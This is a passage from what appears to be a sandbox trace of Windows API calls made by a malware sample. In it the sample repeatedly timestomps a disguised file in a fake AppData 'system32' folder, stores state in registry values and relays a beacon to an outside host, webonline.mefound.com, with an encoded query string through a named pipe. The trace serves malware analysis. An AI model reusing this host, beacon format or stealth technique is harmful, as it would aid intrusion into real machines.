(hFile=0x184, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0093.580] CloseHandle (hObject=0x184) returned 1 [0093.580] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c10, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0093.580] GetFileType (hFile=0x184) returned 0x1 [0093.580] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d3c | out: lpSystemTimeAsFileTime=0x1729d3c*(dwLowDateTime=0x52c3510, dwHighDateTime=0x1d3dfbb)) [0093.580] GetLastError () returned 0xb7 [0093.580] SetLastError (dwErrCode=0xb7) [0093.580] GetLastError () returned 0xb7 [0093.580] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.581] SetLastError (dwErrCode=0xb7) [0093.581] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.582] GetLastError () returned 0xb7 [0093.582] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.583] SetLastError (dwErrCode=0xb7) [0093.583] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] GetLastError () returned 0xb7 [0093.584] SetLastError (dwErrCode=0xb7) [0093.584] CloseHandle (hObject=0x184) returned 1 [0093.584] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0093.584] SetFileTime (hFile=0x184, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0093.584] CloseHandle (hObject=0x184) returned 1 [0093.585] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c08, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0093.585] GetFileType (hFile=0x184) returned 0x1 [0093.585] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d34 | out: lpSystemTimeAsFileTime=0x1729d34*(dwLowDateTime=0x52e9670, dwHighDateTime=0x1d3dfbb)) [0093.585] GetLastError () returned 0xb7 [0093.585] SetLastError (dwErrCode=0xb7) [0093.585] GetLastError () returned 0xb7 [0093.585] SetLastError (dwErrCode=0xb7) [0093.585] GetLastError () returned 0xb7 [0093.585] SetLastError (dwErrCode=0xb7) [0093.585] CloseHandle (hObject=0x184) returned 1 [0093.585] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0093.585] SetFileTime (hFile=0x184, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0093.585] CloseHandle (hObject=0x184) returned 1 [0093.585] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xea60) returned 0x0 [0093.806] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c30, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0093.806] GetFileType (hFile=0x184) returned 0x1 [0093.806] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d5c | out: lpSystemTimeAsFileTime=0x1729d5c*(dwLowDateTime=0x54fe9b0, dwHighDateTime=0x1d3dfbb)) [0093.806] GetLastError () returned 0xb7 [0093.806] SetLastError (dwErrCode=0xb7) [0093.806] GetLastError () returned 0xb7 [0093.806] SetLastError (dwErrCode=0xb7) [0093.806] GetLastError () returned 0xb7 [0093.806] SetLastError (dwErrCode=0xb7) [0093.806] CloseHandle (hObject=0x184) returned 1 [0093.806] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0093.806] SetFileTime (hFile=0x184, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0093.806] CloseHandle (hObject=0x184) returned 1 [0093.806] GetLastError () returned 0x0 [0093.806] SetLastError (dwErrCode=0x0) [0093.807] GetComputerNameW (in: lpBuffer=0x172e340, nSize=0x172e320 | out: lpBuffer="CRH2YWU7", nSize=0x172e320) returned 1 [0093.807] _snwprintf (in: _Dest=0x172f1ec, _Count=0x104, _Format="\\\\.\\pipe\\%08x" | out: _Dest="\\\\.\\pipe\\c41b2304") returned 17 [0093.807] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e4ec | out: phkResult=0x72f1ed90*=0x184, lpdwDisposition=0x172e4ec*=0x2) returned 0x0 [0093.807] RegQueryValueExA (in: hKey=0x184, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x172e544*=0x58) returned 0x0 [0093.807] RegQueryValueExA (in: hKey=0x184, lpValueName="Plgv", lpReserved=0x0, lpType=0x0, lpData=0x302de0, lpcbData=0x172e544*=0x58 | out: lpType=0x0, lpData=0x302de0*=0x88, lpcbData=0x172e544*=0x58) returned 0x0 [0093.807] RegCloseKey (hKey=0x184) returned 0x0 [0093.807] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x184, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0093.807] RegQueryValueExA (in: hKey=0x184, lpValueName="Gdx", lpReserved=0x0, lpType=0x0, lpData=0x172e544, lpcbData=0x172e548*=0x4 | out: lpType=0x0, lpData=0x172e544*=0x0, lpcbData=0x172e548*=0x4) returned 0x0 [0093.807] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x17c, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0093.807] RegQueryValueExA (in: hKey=0x17c, lpValueName="FGcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0093.807] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e520 | out: phkResult=0x72f1ed90*=0x190, lpdwDisposition=0x172e520*=0x2) returned 0x0 [0093.807] RegSetValueExA (in: hKey=0x190, lpValueName="Gdx", Reserved=0x0, dwType=0x4, lpData=0x172e578*=0x0, cbData=0x4 | out: lpData=0x172e578*=0x0) returned 0x0 [0093.807] RegCloseKey (hKey=0x190) returned 0x0 [0093.807] GetLastError () returned 0xcb [0093.807] SetLastError (dwErrCode=0xcb) [0093.807] GetLastError () returned 0xcb [0093.807] SetLastError (dwErrCode=0xcb) [0093.807] GetLastError () returned 0xcb [0093.807] SetLastError (dwErrCode=0xcb) [0093.807] GetLastError () returned 0xcb [0093.807] SetLastError (dwErrCode=0xcb) [0093.807] GetLastError () returned 0xcb [0093.807] SetLastError (dwErrCode=0xcb) [0093.807] GetLastError () returned 0xcb [0093.807] SetLastError (dwErrCode=0xcb) [0093.807] GetLastError () returned 0xcb [0093.807] SetLastError (dwErrCode=0xcb) [0093.807] GetLastError () returned 0xcb [0093.807] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] GetLastError () returned 0xcb [0093.808] SetLastError (dwErrCode=0xcb) [0093.808] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2c0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0093.808] GetFileType (hFile=0x190) returned 0x1 [0093.808] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3ec | out: lpSystemTimeAsFileTime=0x172c3ec*(dwLowDateTime=0x54fe9b0, dwHighDateTime=0x1d3dfbb)) [0093.808] GetLastError () returned 0xb7 [0093.808] SetLastError (dwErrCode=0xb7) [0093.808] GetLastError () returned 0xb7 [0093.808] SetLastError (dwErrCode=0xb7) [0093.808] GetLastError () returned 0xb7 [0093.808] SetLastError (dwErrCode=0xb7) [0093.809] CloseHandle (hObject=0x190) returned 1 [0093.809] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0093.809] SetFileTime (hFile=0x190, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0093.809] CloseHandle (hObject=0x190) returned 1 [0093.809] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0093.809] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x194 [0093.809] SetNamedPipeHandleState (hNamedPipe=0x190, lpMode=0x172e524, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0093.809] GetTickCount () returned 0x261dd [0093.809] GetLastError () returned 0x0 [0093.809] SetLastError (dwErrCode=0x0) [0093.809] GetLastError () returned 0x0 [0093.809] SetLastError (dwErrCode=0x0) [0093.809] GetLastError () returned 0x0 [0093.809] SetLastError (dwErrCode=0x0) [0093.809] GetLastError () returned 0x0 [0093.809] SetLastError (dwErrCode=0x0) [0093.809] GetLastError () returned 0x0 [0093.809] SetLastError (dwErrCode=0x0) [0093.809] GetLastError () returned 0x0 [0093.809] SetLastError (dwErrCode=0x0) [0093.809] GetLastError () returned 0x0 [0093.809] SetLastError (dwErrCode=0x0) [0093.809] GetLastError () returned 0x0 [0093.809] SetLastError (dwErrCode=0x0) [0093.809] GetLastError () returned 0x0 [0093.809] SetLastError (dwErrCode=0x0) [0093.809] GetLastError () returned 0x0 [0093.810] SetLastError (dwErrCode=0x0) [0093.810] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2ac, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0093.810] GetFileType (hFile=0x198) returned 0x1 [0093.810] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3d8 | out: lpSystemTimeAsFileTime=0x172c3d8*(dwLowDateTime=0x54fe9b0, dwHighDateTime=0x1d3dfbb)) [0093.810] GetLastError () returned 0xb7 [0093.810] SetLastError (dwErrCode=0xb7) [0093.810] GetLastError () returned 0xb7 [0093.810] SetLastError (dwErrCode=0xb7) [0093.810] GetLastError () returned 0xb7 [0093.810] SetLastError (dwErrCode=0xb7) [0093.810] CloseHandle (hObject=0x198) returned 1 [0093.810] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0093.810] SetFileTime (hFile=0x198, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0093.810] CloseHandle (hObject=0x198) returned 1 [0093.810] strlen (_Str="webonline.mefound.com") returned 0x15 [0093.810] strlen (_Str="index/index.php?h=ppbto8NHADo%3d&d=ppboQHhZlzqml%2bKS9XExD56k2JTzdDAOlqbto8NHADqmlu2jw0d%3d") returned 0x5b [0093.810] WriteFile (in: hFile=0x190, lpBuffer=0x31ff50*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x172e4f8, lpOverlapped=0x311230 | out: lpBuffer=0x31ff50*, lpNumberOfBytesWritten=0x172e4f8*=0x86, lpOverlapped=0x311230) returned 1 [0093.811] ReadFile (in: hFile=0x190, lpBuffer=0x171e538, nNumberOfBytesToRead=0xffff, lpNumberOfBytesRead=0x171e534, lpOverlapped=0x311230 | out: lpBuffer=0x171e538*, lpNumberOfBytesRead=0x171e534*=0xd, lpOverlapped=0x311230) returned 1 [0098.679] WaitForSingleObject (hHandle=0x194, dwMilliseconds=0x7a120) returned 0x0 [0098.679] GetOverlappedResult (in: hFile=0x190, lpOverlapped=0x311230, lpNumberOfBytesTransferred=0x171e534, bWait=0 | out: lpNumberOfBytesTransferred=0x171e534) returned 1 [0098.680] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0098.680] GetFileType (hFile=0x198) returned 0x1 [0098.680] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c3fc | out: lpSystemTimeAsFileTime=0x172c3fc*(dwLowDateTime=0x83696b0, dwHighDateTime=0x1d3dfbb)) [0098.680] GetLastError () returned 0xb7 [0098.680] SetLastError (dwErrCode=0xb7) [0098.680] GetLastError () returned 0xb7 [0098.680] SetLastError (dwErrCode=0xb7) [0098.680] GetLastError () returned 0xb7 [0098.680] SetLastError (dwErrCode=0xb7) [0098.681] CloseHandle (hObject=0x198) returned 1 [0098.681] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0098.681] SetFileTime (hFile=0x198, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0098.682] CloseHandle (hObject=0x198) returned 1 [0098.683] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x198, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0098.683] RegSetValueExA (in: hKey=0x198, lpValueName="FGcnt", Reserved=0x0, dwType=0x4, lpData=0x172e540*=0x0, cbData=0x4 | out: lpData=0x172e540*=0x0) returned 0x0 [0098.683] RegCloseKey (hKey=0x198) returned 0x0 [0098.683] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x198, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0098.683] RegQueryValueExA (in: hKey=0x198, lpValueName="FGcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0098.683] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0098.683] GetFileType (hFile=0x19c) returned 0x1 [0098.683] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0x83696b0, dwHighDateTime=0x1d3dfbb)) [0098.683] GetLastError () returned 0xb7 [0098.683] SetLastError (dwErrCode=0xb7) [0098.683] GetLastError () returned 0xb7 [0098.683] SetLastError (dwErrCode=0xb7) [0098.683] GetLastError () returned 0xb7 [0098.683] SetLastError (dwErrCode=0xb7) [0098.684] CloseHandle (hObject=0x19c) returned 1 [0098.684] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0098.684] SetFileTime (hFile=0x19c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0098.684] CloseHandle (hObject=0x19c) returned 1 [0098.684] CloseHandle (hObject=0x190) returned 1 [0098.684] CloseHandle (hObject=0x194) returned 1 [0098.684] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0xea60) returned 0x0 [0098.684] GetLastError () returned 0x0 [0098.684] wsprintfA (in: param_1=0x172ebbc, param_2="%s\\%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\olestdmp.ocx") returned 60 [0098.684] wsprintfA (in: param_1=0x172e974, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\78f5d1ae4590aa11.tmp") returned 57 [0098.684] lstrlenA (lpString="olestdmp.ocx") returned 12 [0098.684] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x172e974 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0098.684] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpString2="\\" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" [0098.684] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0098.684] wsprintfA (in: param_1=0x172e540, param_2="%02X" | out: param_1="6F") returned 2 [0098.684] lstrlenA (lpString="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\") returned 37 [0098.684] lstrcatA (in: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\", lpString2="6F" | out: lpString1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F") returned="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\\\6F" 